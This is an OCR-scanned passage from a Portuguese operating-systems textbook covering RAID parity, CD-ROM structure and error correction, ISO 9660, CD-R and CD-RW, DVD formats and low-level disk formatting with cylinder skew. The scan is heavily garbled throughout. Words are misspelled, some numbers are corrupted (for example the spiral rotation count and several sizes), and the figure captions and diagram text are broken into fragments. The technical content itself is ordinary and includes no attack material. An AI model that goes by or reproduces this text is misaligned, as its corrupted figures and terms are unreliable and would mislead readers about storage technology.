usuario c os dados antigos da paridade c, entao, recalcular 
a nova paridade a partit deles. Mesmo com essa otimiza- 
ęao, urna peqitena atualizaęao precisa de duas leituras c 
duas escritas, 

Em consequenda da pesada carga de trabalho no disco 
dc paridade, esic pode sc tornar um gargalo, Esse gargalo 
e clirmnado no RAID niVcl 5 por meio da distribuięao u ni¬ 
le rme dos bits de paridade em lodos os discos, de modo 
circular, como most rad o na Figura 5.17(1). Contndo, na 
ocorrencia de u ma quebra de disco, a reconstruęao do eon- 
teudo do disco falhado e um processo compIexo. 

CD-ROM s 

Nos ultimos tempos, os discos ópticos (cm comrapo- 
sięao aos magnćticos) tem se tornado cada vez mais aces- 
siveis. Eles tern densidade de gravaęao muito maior do 
quc os discos magneticos convendonais* Os discos oplicos 
foram originalmente desenvolvidos para armazenar pro- 
gramas de televisao, mas podem ter um uso mais atraente 
como disposUivos dc armazenarnento em computadores, 
Em virtude dc sua capacidadc potcndalmente grandę, os 
discos ópticos tem sido assunto dc mnita pcsąuisa e passa - 
do por uma evo!uęao inertvelmenie rapida. 

Os discos oplicos de primeira geraęao foram inventa- 
dos pelo conglomerado holandes Philips para o armazena- 
mento de fil mes. Eles tinbam 30 cm de diametro e eram 
comercializados com o nonie LasciYision, mas nao se ter¬ 
na ram popularem a nao ser no Japa o. 

Em 1980, a Philips, juntamente com a Sony, deserwol- 
veu o CD (compact disk), que substituiu rapidamente o disco 
de vinil de 33 1/3 rpm para o armazenarnento dc musi ca s 
(exceio entre os tradkionalistas mais romanticos, que ain- 
da preferem o vinll). Os detal h es lecnicos precisos para o 


CD foram publicados no documento de Padrao Iniernado- 
nal oficial (IS 10149), conhecido popularmente como Li- 
vro Wrmełho, em razao da cor de sua capa. fOs padroes 
intemacionais sao cmiiklos pela Organizaęao Imernacional 
para a Padronizaęao (International Orgamzation for Stan- 
dartization — ISO), que e a contrapartida imernacional dos 
grup os de padroes na ci ona i s como DIN etc. Cada urn tem 
um nu mero IS.J A qucstao prindpal da pubłicaęao das es- 
pedficaęoes de dispositivos c discos como um Padrao Inter¬ 
nacjonał e a de penrritir que os CDs de diferentes gravadt>- 
ras e os apardhos ektronicos de fabricames diversos sejam 
compativeis. lodos os CDs possuem 120 mm de diametro 
e 1,2 mm de espessura, com um furo central de 15 mm. O 
CD de audio foi a primeira midia dc armazenamemo tiigi- 
lal cm rnassa bem-sucedida. Supoe-se que eles dtirem ceni 
anos. Por favor, veriFiquc novamenie no ano 2080 atć que 
ponto foi satisfatório o primetro lote. 

Um CD e pro duzi do em varias ctapas, ćonsistindo no 
uso de um laser infravermelho de alta potencia para qiiei- 
mar orificios de Q,8 micron de diametro em um disco-mes- 
tre revesUdo de vidro. A partir desse disco-mestre e feita 
uma matriz comendo elevaqóes nos locais onde os oriffdos 
foram feitos pelo laser. Em seguida, urna resina derretida 
de policarbonato e derramada nessa matriz para fazer um 
CD com o mesmo padrao de orifidos do disco-tnestre de 
vidro. Entao, uma camada muito fina dc akmimio refletor 
c depositada sobre o policarbonato, cobcrto por um vcrniz 
protetor, c finalmcnte recebe um rótulo. As regioes rebai- 
xadas no substrato de policarbonato sao chamadas de de- 
pressoes as arcas nao queimadas entre as depressoes 
sao chamadas superficies (iands). 

Ouando os CDs sao tocados, um diodo de laser dc bal¬ 
sa potencia dispara inna luz infravermelha com um com- 
primento dc onda dc 0,78 micron sobre as depressoes e as 
stipcrfid.es b medida que des giram. O laser esta no lado do 
policarbonato, de modo que as depressoes estao vokadas 
para o laser. Como as depressoes tem uma aliura de 1/4 
do ępmprimento de onda da luz do laser, a luz refktida 
de urna depressao tem melade do comprimento dc onda da 
luz relletida da superficie quea envolve. Em consequencia 
disso, as duas partes iiuerferem destruiivamente e retor- 
nam menos luz para o fotodetector do que a luz yjgorosa 
de uma superficie. Ć assirn que um reprodutor de CD di- 
ferencia uma depressao de uma superffeie. Embora possa 
parecer simples usar uma depressao para representar um 
0 e uma superficie para representar um i, e mais confiavd 
imerprciar uma transięao depressao/superficie ou superlf- 
cie/depressao como um 1 e a ausencia dęła como um 0 e, 
por isso, e usado esse esąuema. 

As depressoes e as superfieies sao escritas em inna uni- 
ca espiral contmuo que se inicia próxitno do oriffcio central 
e gira ate uma distancia de 32 mm em direęao a mar gem. A 
espiral realiza 22.KS8 rotaęoes ao redor do disco (cerca de 
600 por mm). Se esLicado, ele mediria 5,6 km. A espiral e 
i lustra da na Figura 5. IS. 
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Figura 5.1 8 Estrutura de gravaęao de urn disco compacto 
I ou CD-ROM. 

Para tocar u ma musica em uma taxa u ni formę, e ne- 
cessario que as depressoes e as superffcies sejam captadas 
ein Lima ve!ocidade linear constante. Consequentemenie, 
a taxa de rotaęao do CD dcvc ser continuamente reduzi- 
da ąuando o cabeęote de leitura esta sc movcndo da parte 
mais interna para a parte mais exlenia do CD. Na parte mais 
interna, a taxa de rotaęao deve ser de 530 rpm para atingir 
uma taxa de fluxo descjada dc 120 cm/s; na parte mais ex- 
tema, da sc reduz para 200 rpm para permitir a mesma 
velocidade linear no cabeęote. Urn di$positivo de velocida- 
de lincar constante ć lotalmentc diferente de uma unidade 
dc disco magnćtico, a qual opera em uma vdoddade an- 
gular constante, independentemente de on dc o cabeęote 
esteja posi clona do. Aletn disso, 530 rpm estao ainda mu i to 
distames das 3.600 a 7.200 rpm oblidas pela maioria dos 
discos magnet i cos. 

Em 1984, a Philips c a Sony conseguiram usar o CD 
para o armazenamento de dados computacionais, publican- 
do o Livro Amarelo, que de One urn padrao preciso para 
aąuilo quc hojc e chamado de CD-ROM (disco compac¬ 
to — memória apemas de leitura — ou compact disk — 
muionly mcmory). Para introduzi-los no mercado ate entao 
ja substancial de CDs de audio, os CD-ROMs forarn feitos 
com os mesmos Liman hos fisi cos dos CDs de audio, com 
compatibilidades mecanieas e ópiicas, sendo produzidos 
com as mesmas maquinas de mokles baseadas na injeęao 
dc policarbonato. Isso gerou nao somente a obrigatorieda- 
dc do uso daąueles motores lentos de veloridade variavd, 
mas tambeni um custo menor de fabricaęao de um CD- 
ROM, que seria bem inierlor a um dolar para um volume 
modei ado dc CDs. 

O que o Livro Amardo definiu foi a formataęao dos 
dados computacionais* Ele tambćm mdhorou as habilida- 
des de correęao de erros do sistema — um passo essencial, 
pois, apesar de os amantes da musica nao nota rem a perda 
dc um bit aqui e outro acola, os usuarios de computado- 


res lendem a ser miii to mais exigentes nessa ąuestao. O 
formalo basico de um CD-ROM comlstc em codificar eada 
by te em um simbolo de 14 bits, que sao sufidentes para 
eodilicac usando Hamming, 1 byle de 8 bits com 2 bits de 
sobra, Na verdade, usa-se um sistema de codifkaęao mais 
potcmc. O mapeamento de 14 para 8 durante a leitura e 
feito diretamente pelo hardware por meto de uma tabela 
de conversao, 

No nfvel superior seguime, um grupo dc 42 sfmbolos 
consecutivos forma um quadro (frame) de 588 bits. Cada 
quadro contćm 192 bits de dados (24 byies). Os 396 bits 
restantes sao usados para controle c correęao dc erro. De- 
les, 252 sao os bits de correęao de erros nos sfmbolos de 14 
bits, e 144 sao carregados na carga lilii dos sfmbolos de 8 bils. 
Ate agora, esse esquema e identieo tanto para CDs de audio 
como para CD-ROMs, 

O que o Ltvro Amarelo inovou foi agmpar 98 ąuadros 
em um setor do CD-ROM, como mostra a Figura 5,19. 
Cada setor do CD-ROM comeęa com um preambuło dc 16 
byies; os primdros 12 sao 0 0FF FF FFFFFFFFFPFFFFFF00 
(em hexadecimal) para permitir ao lei tor reconhecer o im- 
eio do setor de um CD-ROM. Os próximos 3 bytes contem 
o nu mero do setor, o qual e necessarlo porque o p osi clona- 
mento do cabeęote cm um CD-ROM — quc lem uma unica 
espiral de dados — e muito mais dificil do que sobre urn 
disco magnelico, com suas trilhas concentricas uriiformes* 
Para posicionar, o software no dispositivo de CD calcu la 
aproximadamente a posięao para onde ir, movc o cabeęote 
para la e, entao, inidaliza a procura pdo preambuło para 
verificarate que porno su a su posięao foi boa. O ultimo byle 
do preambuło indica o modo, 

O Livro Amarelo ddine dois modos. O modo 1 usa o 
esqucma da Figura 5,19, com um preambuło de 16 byies, 
2,048 byies de dados e um código de correęao de erro (ECC) 
de 2SS bytes (código dc Reed- Solomon). O modo 2 combi na 
os carnpos de dados e ECC em um campo de dados de 2,336 
bytes para aqudas aplicaęoes que nao precisam de correęao 
de erros (ou nao podemperder tempo para caiaila-Ia} r como 
audio e video. Notę que, para oferecer a maior confiabilida- 
de possfvd, sao usados ues csquemas de correęao de erros; 
dentro de um sfmbolo, demro de um quadro e dentro de um 
setor do CD-ROM. Os erros de um unico bil sao corrigidos 
no nfvel mais baixo, os erros de surios curtos de dados sao 
corrigidos no mvel do quadro e quaisquer erros residuais 
sao capturados no nivel dc setor, O custo dessa conhabiEida- 
de e usar 98 ąuadros de 588 bits (7.203 bytes) para transpor- 
tarapenas 2,048 bytes de dados — unia eliciencia de apenas 
28 por cento. 

Os disposilivos de CD-ROM de velocidade unica ope- 
ram a 75 setores/s, o que permite uma iaxa de dados de 
153.600 bytes/s no modo I e 175,200 bytes/s no modo 
2. Os dispositivos de CD-ROM com veloddade dupla sao 
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Gada simbolo contćm 
o o a - * * a □ a 8 bits de dados e 6 bits 
%-“y“- * COJTe ?a° de srros 

42 simbolos formam urn quadro 14 x 42 = 5S8 bits 
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Preambuło 

98 quadros lormam um setor 

i 

^ Dados 

ECC 


16 bytes 2048 288 


I Figura 5.19 Esquema lógico dos dados em um CD-ROM. 

duas vezcs mais rapidos e assim por dianie, ate a vdodda- 
de maxima. Dessa mandra, um di$positivo 40x pode cn- 
viar dados em unia taxa de 40 x 153.600 bytes/s, su po tuta 
que a imerface do dispositivo, o barramento e o sistema 
operacional possani todos irabalhar nessa taxa de dados. 
Um CD dc audio padrao tem cspaęo para 74 miniitos dc 
musica, o quc permite urna capacidade de ÓS 1.984,000 
bytes quando usado no modo 1. Esse nu mero geralmeme 
e relendo como 650 MB, porąue 1 MB equivale a 2 ll} bytes 
(1.048,576 bytes), e nao a 1.000.000 bytes. 

Notę que mesmo um dispositivo de CD-ROM de 32x 
(4.915,200 bytes/s) nao e pareo para um dispositivo rapb 
do de disco magnetico SCSI-2 a 10 MB/s, muito embora 
muilos CD-ROMs usem a imerface SCSI (existem tambem 
CD-ROM IDE). Quando nos damos conta de que o tempo 
dc posicionamento geralmeme Ieva centenas de ms, ternos 
de concordar quc os disposiiivos de CD-ROM nao esiao na 
mesma categoria de desempenho dos dispositivos de disco 
magnetico, independentemente dc sua grandę capacidade 
de armazenamento. 

Em 1986, a Philips surpreendeu novamente com o Li- 
vro Verde, adicionando graficos c a habilidade de misturar 
audio, vfdeo e dados em um mesmo setor — u ma caracte- 
ristica essencial para o CD-ROM de uuiUimfdia, 

A ulLirna peęa do ąuebra-cabeęa do CD-ROM e o sis¬ 
tema de arqiuvos. A firn de Lor nar possfrel o uso do mes¬ 
mo CD-ROM em difercntes compuladores, um acordo foi 
estabelecido para os sistemas de arquivos dos CD-ROMs. 
Para chegar a esse acordo, os repie sen La mes de muitas 
empresas se reuniram em Lakę Tahoe, nas High Sierras 
na franteira entre California e Nevada, e planejaram um 
sistema de arquivos que des chamaram de High Sierra. 
Posteriormenie evoiuiu para tornar-se um padrao inter- 
nacional (ISO 9660). Esse sistema apresema ires niveis. O 
mvel i usa nom es de arquivos de ate oito caracteres, opcio- 
nalmente segukios por uma cxtcmao de ate tres caracteres 
(coiwenęao de nomenclatura para arqiuvos MS-DOS). Os 
nomes de arquivos podań conier somente Ictras maitiscu- 
las, dfgitos e rraęo. Os diretórios podem ser aninhados cm 
urna profurididade de ate S, mas os nomes dos direLórios 


Gada quadro contem 
192 bits de dados (24 bytes) 
e 396 bita de correęao de erros 


Setor modo 1 
(2352 bytes) 


podem nao conter extensóes + O nfvel 1 requer que todos os 
arquivos sejam contfguos; isso nao configura um problenia 
para a rmdia escrita somente uma vez. Qualquer CD-ROM 
que siga o padrao ISO 9660 mvel 1 pode ser lido usando 
MS-DOS, um computador Apple, um computador UNIX 
on qualqucroutro computador. Os produtores dc CD-ROM 
consideram essa propriedade uma grandę vantagem. 

O nfvcl 2 do padrao ISO 9660 permite nomes de ate 32 
caracteres e o nfvel 3 permite arquivos nao comfnuos. As 
extensoes Rock Ridge (assim chamadas em razao da ddade 
do filme Emm no Oesie, de Gene Wilder) per mitem tamanhos 
longos para nomes (para UNIK), identificadores de usuarios 
(14ser ID — UID) e de grupos igrewp ID — GID) e ligaędes 
simbólicas, mas os CD-ROMs nao padronizados dc acordo 
com o nfvel 1 nao serao legfveis eni todos os computadores. 

Os CD-ROMs tem sc tornado cxucmamenie popula- 
res para a publicaęao de jogos, filmes, enciclopedias, atlas e 
trabalhos de todos os tipos. A maioria dos softwares conter- 
ciais e publicada atualmeme em CD-ROMs. A combinaęao 
dc grandę capacidade c baixo custo dc fabricaęao os tonią 
apropriados a inumeras aplicaęoes. 

CDs gravavers 

Inidalmente, o equipamento necessario para produ- 
zir um CD-ROM mestre (ou um CD de audio) era bas- 
tante caro, Mas, como norma I me nie ocorre na imlustria 
de computadores, nada permanece caro por muito tempo, 
Em meados da decada dc 1990, os gravadore$ de CD — 
nao maiores do que os leitores dc CD — eram perifcricos 
comuns disponweis na maioria das lojas de compuiado- 
res. Esses dispositivos ainda eram diferentes dos discos 
magneticos, pois, uma vcz escritos, os CD-ROMs nao po- 
deriam ser apagados. Todavia, rapidamente sc encontrou 
um nicho para clcs, utiiizando-os como dispositivos para 
backups de grandes discos ngidos e tambem permitindo 
que companhias individuais ou ernergentes fabricassem 
seus próprios CD-ROMs ou llzessem discos-mestres para 
as empresas de cópias de CDs em alta eseala, Esses dis¬ 
cos sao conhcddos como CD-Rs (CDs gravaveis ou CD- 
-recordabks). 
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Fisicameme, os CD-Rs inidam como CDs virgens de 
policarbonato de 120 mm, como os CD-ROMs, exceio pęto 
falo dc conterem um caminlio largo dc 0,6 mm para guiar 
o laser du ranie a escrila. O caminlio aprcsenla urna cx- 
cursao senoidal de 0,3 mm em unia freąuencia de exata- 
menie 22,05 k.Hz para f orne cer realimentaęao continua, dc 
modo que a vdocidade dc rolaęao possa ser mon i lora da 
com prerisao e ajustada, se necessario, Os CD-Rs parecem 
CD-ROMs normais, cxccto quc sao dourados em vez de 
prateados, A cor dourada se devc ao uso dc ouro no lu- 
gar de alummio para a ca mada refktóra. D ikrę n tein en te 
dos CDs prateados, que possnem depressoes ffsicas sobre 
eles, nos CD-Rs as ditcrenęas na refletividadc entre as de¬ 
pressoes c as superfkies predsam scrsinmladas, Isso e fcito 
adidonando urna camada de linia entre o policarbonalo 
e a camada refktóra de ouro, como mostra a Figura 5.20. 
Dois lipos dc tintas sao usados; a danina, quc e vcrdc, c a 
pialocianina, que e um laranja amardado. Os q uf mi cos sao 
capazes de discuiir horas a fio sobre qual e a melhor. Essas 
tintas sao similares as nsadas em fotografia, o que cxplica 
por que as empresas Eastman Kodak c Fuji sao as maiores 
fabricantes de CD-Rs virgens. 

Em seu estado i nicią I, a camada de linia c transpa ren¬ 
ie e permiie que a luz do laser atravesse e relliia sobre a 
camada dc ouro. Para cscrcvcr, o laser do CD-R ć cievado 
para alta potcncia (5-16 inW) t Quando o raio incide em 
um porno de tinta, de o aquece, rompendo urna ligaęao 
quimica. Essa mudanęa na estrutura molecular cria um 
ponto cscuro. Durante a leitura {em 0,5 mW), o lotodetec- 
tor capia as difcrcnęas entre os pontos cscuros onde a tinta 
foi aquedda e as areas transparenies onde ela permanece 
Intacta, Essas diferenęas sao imerpretadas como as dife- 


renęas entre as depressoes e as superffcles, mesmo quando 
lidas por um leiior convenckmal de CD-ROM ou por um 
tocador dc CD dc audio, 

Nenhum lipo novo de CD 'seria alguenC sem um livro 
colorido, de modo que o CD-R tambem possui o scu, o Li" 
vro Laranja, publicado em 1 989. Esse documcnto define 
CD-R e tambem um novo forinato, o CD-ROM XA, que 
permite que os CD-Rs sejam gravados de modo ineremen- 
tal, com poucos setores boje, um pouco mais a ma n ha e um 
pouco no próximo mes. Um grupo de setores consecutivos 
gravados de urna vez. e cli a mad o de trilha do CD-ROM. 

Um dos primeiros usos de CD-R foi feito pela maquina 
PhotoCD da Kodak, Nesse sistema, o cliente traz um rolo de 
fi 1 me batido juntamente com sen PhotoCD para o processa- 
dor dc foto e ganha novamente o mesmo PhotoCD com as 
novas exposięoes adidonadas após as antigas. O novo lote, 
que e criado varrendo-se os negativos, e graeado no Photo¬ 
CD como urna trilha sępa rada. A grayaęao incrememal foi 
neccssaria porque, quando esse produto foi introduzido no 
mcrcado, os CD-Rs virgens cram rmiiio caros para permitir 
a mili za ęa o de um novo CD-R a cada rolo de filme. 

Gontu do, a gravaęao incremental cria um novo próbie- 
ma. Antes do Livro Laranja, todos os CD-ROMs inidahnen- 
te lin ha m u ma ii ni ca tabela de conteudos de volume 
(volume takie of contems — VTQC). Esse csąuema na o fum 
ciona com gravaęoes inerementais (isto e, varias irilhas). 
A sol u ca o apresentada no livro Laranja foi fornecer cada 
trilha do CD-ROM com sua própria VTOC. Os arquivos 
relacionados na VTOC podem induir alguns arquivos das 
uilhas ameriores ou todos des. Após o CD-R ser inserido 
no disposilivo, o sistema operadonal verifica iodas as tri - 
llias do CD-ROM para localizara VTQC mais rcccnte, quc 
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■ Figura 5.20 Corte transversal de u m CD-R (tamanho red uz ido), Um CD-ROM prata tem estru tura semelhante, exceto pelas 
camadas de tinta e de aluminio que aparecem no lugar da camada de ouro. 
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rontem o estado autal do disco. Indmndo na VTOC a utai 
algum, mas nao lodos os arquivos das trilhas ameriores, 
lorna-se possfvcl criar a ilusao dc que os arquivos nao in- 
clufdos foram removidos. As irilhas po dem ser agrupadas 
em sessoes, originando os CD-ROMs multisessao. Os to- 
cadores-padrao de CD de audio nao podem irabalhar com 
CDs de vahas sessoes porque eles esperam cncontrar uma 
unica VTOC no infcio. Alguns aplicatwos ainda conseguem 
manipitla-los. 

O CD-R pennite quc pessoas c companhias copiem 
com fadlidade CD-ROMs (e CDs de audio), mu i las vezes 
yiolando os direitos amorais. Varios esquemas tem sido 
planejados tanio para dificultar a pirataria quanto para 
impedir a leitura do CD-ROM durantc o usn de qualqucr 
ontra versao do software que nao seja a odginał Um deles 
envolve a gravaęao no CD-ROM de lodos os tamanhos dos 
arquivos como multigigabyte, anulando qualquer tentati- 
va de coptar os arquivos para o disco rigido usando soft¬ 
ware- -padrao para cópia. Os tamanhos Ycrdadeiros sao 
enibutidos no software de instalaęao ou esrondidos {pos- 
sivclmente medianie o uso dc criptografia) no CD-ROM 
cm um local nao esperado. Um outro csquema usa ECCs 
inienciona!menie incorretos cm seiores scledonados, na 
expedativa de que, duranie a cópia, o software de cópia 
padrao J corrija' os erros. O software aplicaiivo odginał ve- 
rifica os ECCs por si próprio, rccusando Irabalhar caso os 
erros lenliam sido corrigidos. Tambcm podem ser usados 
intervalos nao padronizados entre as trilhas e muitos ou- 
tros \1efeitos' fisi cos, 

CDs regravaveis 

Embora as pessoas estejam acostumadas ao uso de mf- 
dias gravaveis urna unica vez, como papeis e ftlmes foto- 
graficos, exisie uma dema uda pelo CD-ROM regravavel. 
O CD-RW f CD-rewritahte — CD rcgravavcl) ć uma nova 
tecnologia dispomvd, que usa rmdia de mesmo tamanho 
quc o CD-R. Eniretamo, em vez de usar linia verde ou 
la ran ja, o CD-RW usa uma liga metal i ca de prata, mdi o, 
antimonio e lelurio para a camada de gravaęao, Essa liga 
apresenta dois estados estavei$; cristalino e a morfo, com 
diferenies refletividades. 

Os dispositivos de CD-RW empregam lasers com tres 
poiencias dileremes. Na poienda alta, o laser derreie a liga 
metalica, coiwertendo-a do estado cristalino, com alio grau 
de reflexao, para o estado a morfo, com batxo gran de refle- 
xao, para gerar uma depressao. Na potenria media, a liga 
metalica derreie e ret orna a seu estado cnsialino natural 
para novamente se tornar uma su perlicie. Na poienda bai- 
xa, o estado do materiał e sentido {para leitura), mas ne- 
nhuma mudanęa de faseocorre. 

A razao para o CD-RW nao ter substituido o CD-R e 
que o CD-RW virgem e muito mais caro do que o CD-R 


virgem. Alem disso, como meio de backup de disco rigido, 
o falo de um CD-R nao poder ser apagado addenialmente 
após ter sido escrito e uma grandę vaniagem + 

DVD 

O fermato basico de CD/CD-ROM vem sen do usado 
desde 1980, A tccnologia tem md ho rado desek entao, de 
modo que os discos ópticos dc alta capacidadc agora sao 
acessweis economicamente e existe uma grandę demanda 
para eles. Hollywood adoraria trocar as fitas de video ana- 
lógicas por discos digitais, uma vez que os discos tem uma 
alta qualidade, sao baratos, duram mais, utilizam menos 
espaęo para armazenagem cm v i de o lo ca do ras e nao prcci- 
sam ser rebobinados, As empresas de aparelhos eletronicos 
sempre esiao procurando por um novo produto de impac- 
to, e muitas companhias de compmadores querem incor- 
porar cara cle nsticas multimidia em seus softwares. 

Essa combinaęao de tecnologia e demanda por tres in- 
ditsirias extreniamente poderosas e ricas levou ao surgi- 
mento do DVD, originalmcntc um acrónimo dc disco de 
video digital (digital video disk), mas atualmcntc oficiali- 
zado como disco versatil digital (digitai wrsatik disk). Os 
DYDs usam o mesmo p roje to geral dos CDs, com discos de 
policarbonato de 120 mm moldados e injetados contendo 
depressoes e superfides ihnninadas por um diodo dc laser e 
lidas por um fotodclector. Entrelanto, cxistetn as seguinies 
novidades: 

i + Depressoes me norę s (0,4 micron contra 0,8 micron 
dos CDs). 

2* Uana espiral mais esireito (0,74 micron entre irilhas 
contra 1,6 micron dos CDs) + 

3. Um laser vermelho (0,65 micron contra OJS mf- 
cron dos CDs). 

Junios, esses mdhoramentos signiiicam um aumento 
dc sctc vezes a ca pa ci da de original resul lando em 4,7 GB, 
Um dispositiYo de DVD lx trabalha em 1,4 MR/s (contra 
150 KB/s dos CDs). Infeiizmente, a mudanęa para os la sers 
YCrmdhos usados nos supermcrcados implicn quc os apa- 
rclhos de DVD predsarao dc um segundo laser ou óptica 
dc conversao cspedal para permitir a leitura dos CDs c CD- 
-ROMs existentes, mas com a ąueda no preęo dos lasers, a 
maioria deles atualmente tem ambos, de modo que podem 
ler ambos os lipos de midia. 

4,7 GB sao suficientes? Talvez, Usando comprcssao 
MPEG-2 (padronizada pelo ISO 13346), um disco DVD de 
4,7 GB pode conter 133 minut os de um video de lela clieia 
e movimentaęao completa em alta resoluęao (720 x 4S0), 
bem como trilhas sonoras cm ale oito Ifnguas c legendas 
em mais 32 idiomas, Ccrca de 92 por cento de lodos os 
fllmes produzidos por Hollywood leni menos de 133 minu- 
tos. Apesar disso, algumas aplicaęoes como jogos de mul- 
t i midia ou traba lhos de pesquisa podem precisar de mais 
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recursos e Hollywood poderia se interessar em colocar va- 
rios fil mes no mesmo disco, de modo que quatro formatos 
loram dc lin ki os; 

1. Lado simples, ca mada simples (4J GB). 

2. Lado simples, ca mada dupla (8,5 GB). 

3. Lado duplo, camada simples (9,4 GB), 

4. Lado duplo, camada dupla (17 GB). 

Por que tantos formatos? Em uma palayra; polflica. A 
Philips e a Sony ąueriam discos com lado simples e camada 
dupla para a versao de aiia resoluęao, mas a Toshiba e a 
Time Warner queriam com lado duplo e camada slmples. A 
Philips e a Sony acharam que as pessoas nao gosrariam de 
virar os discos dc urn lado para o outro, e a Time Warner 
nao acreditou quc o sistema dc duas camadas cm urn unico 
lado fundonaria. Resultado: ha łodas as combinaęoes pos- 
sfycis, mas ca bera ao mercado determinar qual sobrevivera. 

A iecnologia para implememar camada dupla usa urna 
camada refletora no fundo, coberta por uma camada se- 
mirrefletora. Dependendo de ornie o laser esteja focalizado, 
dc retorna de uma camada ou dc outra, A camada inferior 
precisa dc depressoes c supcrftcies ligeiramente maiores 
para permitir uma leilura confiavd, dc modo quc sua ca- 
pacidadc e urn pouco menor em rclaęao a camada superior. 

Os discos com lado duplo sao feitos com dois discos de 
lado simples de 0,6 mm, colados um de costas para o ou- 
iro. Para manter a mesma espessura em todas as versoes, 
um disco de lado simples consiste em um disco de 0,6 mm 
Sigado a um substrato vazio (ou talvez, no futuro, csse 
substrato seja constitufdo dc 133 minutos dc publiddadc, 
na esperauęa de que as pessoas tenham curiosidade quanto 
ao seu conteudo), A esmmsra dc um disco com lado duplo 
e camada dupla e ilustrada na Figura 5.21. 

O DVD foi projetado por um consórcio de dez compa- 
nhias dc aparelhos cletrónicos — sctc delas sao japonesas —, 
em uma estreito coopcraęao com os prinripais estudios dc 
Hollywood (alguns dos quais sao propriedades das conipa- 
nliias japonesas de dctrónicos desse consórcio), As indus- 
(rias de cornputadores e telecomunicaęoes nao foram con- 
yidadas para a festa, e o enfoąue restiltante incidiu sohre 
o uso de DVD na locaęao de filmes e salóes de vendas. Por 


exemplo, entre as caractensticas-padrao estao o salto em 
tempo real de cenas pesadas' (para permitir que os pais 
transformem um fiimc proibido para menor es em um filme 
adequado para crianęas), seis canais de som e supone para 
a funęao 'pan-and-scan'. Essa ultima caracteristica permite 
quc o leitor dc DVD dccida dinamicamcme como posicio- 
nar as margens esąucrda c dircita dos film es (cuja propor- 
ęao largu ra:a hura e 3:2} para enquadrar na eon figura ca o 
atual do tdeyfeor (cuja proporęao e 4:3), 

Outro Ucm em quc a industria de compiuadores pro- 
vavelmcntc nao teria pensado e na iticompatMidade in- 
tencional emre os discos dcsiinados aos Estados Unidos e 
os destinados a Europa e, ainda, outros padroes para os 
demais cominentes* Hollywood exigiu essa 'caractensti- 
ca' porąue os filmes novos setnpre sao lanęados primei- 
ro nos Estados Unidos e entao enyiados para a Europa. 
A Łdeia era gara mir que as lojas de vfdeo europeias nao 
pudessem comprar yfdeos dos Estados Unidos com mu i ta 
antecedencia, reduzlndo, portanto, as bilheterias dos no- 
vos filmes nos cinemas europeus. Se Hollywood tivesse 
comrolado a industria de compiuadores, lenamos discos 
flexivds de 3,5 polegadas nos Estados Unidos e discos fle- 
xivds de 9 cm na Europa. 

Os mventores dos diferentes tipos de DVD continuam 
trabalhando. Ainda faltam padroes para a próxima geraęao 
por conta dc disputas polfticas emre as empresas de łoca- 
dores (players). Um dos novos dispositivos e a Blu-ray, que 
usa um laser azul de 0,405 p para cmpacotar 25 GB em um 
disco de uma muca camada e 50 GB em um disco de cama¬ 
da dupla. OuLra novidadc c o HD DVD, quc usa o mesmo 
laser azul, mas com capacidadc para ale 15 GB (camada 
simples) e 30 GB (camada dupla). Aguerra entre os forma¬ 
tos dividtu os estudios de cinema, os fabricantes de compu- 
tadores e as empresas de software. Como resultado da fali a 
de padronizaęao, essa geraęao esta decolando com muito 
inenos velocidade e os consumidores precisam esperar a 
poeira baisar para saber qual dos formatos vai sair yence- 
dor. Essa estupidez por parte da industria nos faz lembrar 
do famoso comentario de George Santayana: "Aąueles que 
nao eonsegucm se lembrar dos erros do passado estao eon- 
denados a repeii-kf. 
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1 Figura 5.21 Um DVD lado duplo, camada dupla. 
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5A21 Formataęao de disco 

Um disco rigido consiste dc uma pil ha de prałoś de a!u- 
mmio, liga metalica ou vidro com diametros de 5,25 ou 3,5 
polcgadas (ou ainda mcnores nos computadorcs port aleis). 
Em cada prato e dcpositada urna fi na camada de óxido dc 
meta! magnetizado. Após a fabricaęao, nao ha informaęao 
de qualquer oaturcza no disco. 

Ames que o disco possa ser osado, cada prato deve re- 
ceber urna formataęao de baixo nivel feita por software. 
A formataęao cousislc em criar uma serie dc trilhas eon- 
cćntiicas, cada uma com um certo nujnero de setores, com 
pequeiios intcrvaloś entre des- O forma to dc um setor c 
moslrado na Figura 5.22. 

O preambuło inidaliza com um certo padrao binario 
quc permite ao hardware reconhccer o imcio do setor. Ele 
tambem eontem os numeros do eilindro e do setor c algu- 
mas outras informaęóes, 0 (amanho da parte de dados e 
deLcrminado pelo programa de formataęao de baixo nfvel. 
A maioria dos discos usa setores de 512 bytes. O campo 
ECC eontem informaęoes redimdames que podem ser usa- 
das para a recupcraęao de erros de leitura. O tamanho e 
o conteudo desse campo variam de fabricante para fabri- 
cante, dependendo dc ąuanto cspaęo em disco o projetista 
esta disposto a abrir mao para obici maior confiabilidade e 
do grau de complexidade do código ECC que o comrola- 
dor consiga iraiar, Nao e incomum um campo ECC de ló 


bytes. Alem disso, todos os discos rigidos tein um numero 
de setores sobressalentes alocados para uso na subsiimięao 
de setores com defeitos de fabricaęao. 

A posięao do setor 0 em cada tri!ha e dcslocada com 
relaęao a trilha anterior quando se realiza a formataęao de 
baixo nfveL Esse desiocamemo, chamado de deslocamen- 
to de eilindro (cyłmdncskew), busca melhorar o deseni- 
penho. A ideia e permitir que o disco leia varias trilhas em 
uma operaęao continua sem perder dados. A natureza do 
problema pode ser observada na Figura 5.1ó(a). Suponha 
que uma reąujsięao precise de 1$ setores a partir do setor 
0 da trilha mais interna. A leitura dos p runę i ras i 6 setores 
leva uma roiaęao do disco, mas um novoposidonamento e 
nccessario para mover o cabeęote de leitnra/gravaęao para 
a trilha segnmte, mais externa, permitindo assini aicanęar 
o setor 17. Durante o tempo necessario para mover o ca¬ 
beęote uma trilha para fora, o setor 0 e deixado para tras 
em virtude da rotaęao atnal, sondo necessaria uma nova 
roiaęao complcta atć que o cabeęote seja novamente posi- 
cionado sobre elc. Esse problema e eliminado por mcio do 
deslocamento dos setores iniciais entre as trilhas, conforme 
mostra a Figura 5.23. 

A intensidade do deslocamento de eilindro depende da 
geometria do dispositivo. Porexempjo, imagine urn dispo- 
sitivo de 10 mil rpm que leva 6 ms para sofrer uma rota¬ 
ęao complcta. Se uma trilha eontem 300 setores, urn novo 
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I Figura 5.22 Um setor de disco. 



I Figura 5.23 liustraęao de um deslocamento de eilindro. 





















Sn#w 


234 Sistemas operacionals modernos 


setor passa sob sen cabeęote a cada 20 ps. Se o tempo de 
posicionamento de u ma trilha para outra trillia consecutiva 
e de S00 ps, 40 setores serao passados durante o posicio- 
namento, de modo que o deslocamemo de cillndro deve- 
rla ser de 40 setores, cm vcz dos tres setores mostrados na 
